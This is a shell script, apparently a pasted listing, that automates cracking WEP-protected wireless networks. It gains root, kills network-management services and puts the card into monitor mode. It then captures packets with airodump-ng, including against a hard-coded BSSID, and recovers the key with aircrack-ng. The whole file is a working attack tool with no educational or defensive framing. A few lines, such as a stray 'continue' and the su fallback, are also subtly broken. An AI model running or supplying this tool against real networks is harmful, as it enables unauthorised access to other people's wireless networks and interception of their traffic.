WIFICRACK.sh

1. #!/bin/sh
2. #
3. #
4.  
5. XTERM=${XTERM:-xterm}
6. alias dmenu='dmenu -nb "#333" -nf "#ccc" -sb "#111" -sf "#ff0"'
7.  
8. WLANS=$(echo /sys/class/net/wl* | sed "s%[^ ]*/%%g")
9.  
10. step() {
11.     cmd=$(dmenu -l 4 -p "$1")
12.     [ -z "$cmd" ] || $XTERM -e sh -xc "$cmd;echo Press any key..;read"
13. }
14.  
15. # Only root may pass
16. if [ "$(id -u)" = "0" ]
17. then
18.     echo "Running as root!"
19.     continue
20. elif { gksudo -v && gksudo -l $0 "$@"; } >/dev/null 2>&1
21. then
22.     exec gksudo -E $0 "$@"
23. elif sudo -v &>/dev/null && sudo -l $0 "$@" &>/dev/null
24. then
25.     exec sudo -E $0 "$@"
26. else
27.     echo -n "root "
28.     exec su -c "$(printf '%q ' "$@")"
29. fi
30.  
31. msg() {
32.     echo "$@" | xmessage -file -
33. }
34.  
35. #############
36.  
37. if [ "$WLANS" = "/sys/class/net/wl*" ]; then
38.     msg "No wireless interface found"
39.     exit 1
40. fi
41.  
42. for dep in airmon-ng airodump-ng aircrack-ng dmenu
43. do
44.     if ! hash "$dep" 2>/dev/null; then
45.     msg "The required program '$dep' must be installed"
46.     exit 2
47.     fi
48. done
49.  
50. #############
51.  
52. {
53. cat <<EOF
54. Wireless interfaces found: ${WLANS}
55. Scanning ${WLANS%% *} for available networks..
56. ----------------------------------------------
57. EOF
58. for i in $(seq 5); do
59.     wpa_cli -i ${WLANS%% *} scan >/dev/null || continue
60.     wpa_cli -i ${WLANS%% *} scan_results && break
61. done | sed 's#/#\t#g' | column -t -s "  " # tab-separated fields
62. cat <<EOF
63. ----------------------------------------------
64. Table of frequencies and channels:
65.  
66. Channel Frequency (MHz)
67. 1   2412   
68. 2   2417   
69. 3   2422   
70. 4   2427   
71. 5   2432   
72. 6   2437   
73. 7   2442   
74. 8   2447   
75. 9   2452   
76. 10  2457   
77. 11  2462
78. 12  2467    (illegal in USA)
79. 13  2472    (illegal in USA)
80. 14  2484    (only legal in Japan)
81. EOF
82. } | xmessage -file -
83.  
84.  
85. #gksudo iwlist $WLANI scan | xmessage -file -
86.  
87. cat <<EOF | step '1. Check (and kill) programs that could interfere with the wireless card'
88. systemctl stop wicd networkmanager wpa_supplicant; airmon-ng check kill
89. /etc/rc.d/wicd stop; /etc/rc.d/networkmanager stop; pkill wpa_; airmon-ng check kill
90. airmon-ng check kill
91. airmon-ng check
92. exit # skip this step
93. EOF
94.  
95. { for iw in $WLANS; do
96.     cat <<EOF
97. airmon-ng stop mon0; airmon-ng start $iw
98. airmon-ng stop mon0; airmon-ng start $iw 2 # (channel 2)
99. airmon-ng start $iw
100. EOF
101.    done
102.    echo 'exit # skip this step'
103. } | step '2. Start monitor mode (specify channel if wanted)'
104.  
105. MONS=$(echo /sys/class/net/mon* | sed "s%[^ ]*/%%g")
106.  
107. { for mon in $MONS; do
108.     cat <<EOF
109. airodump-ng $mon -w ./wificrack --ivs --encrypt WEP  # only WEP
110. airodump-ng $mon -w ./wificrack --ivs -c 11 --bssid 00:01:E3:08:4C:9D
111. airodump-ng $mon -w ./wificrack
112. EOF
113.     done
114.     echo 'exit # skip this step'
115. } | step '3. Collect packets (must keep the terminal open)' &
116.  
117. # wait for dmenu to finish before we can launch it again
118. while pidof dmenu > /dev/null
119. do sleep 0.5
120. done
121.  
122. sleep 3s # also wait for some packets
123.  
124. cat <<EOF | step '4. Use collected packets to crack encryption'
125. aircrack-ng ./wificrack*.ivs -l key -f 100 # WEP increased tries (if low number of IV)
126. aircrack-ng ./wificrack*.ivs -l key # WEP
127. exit
128. EOF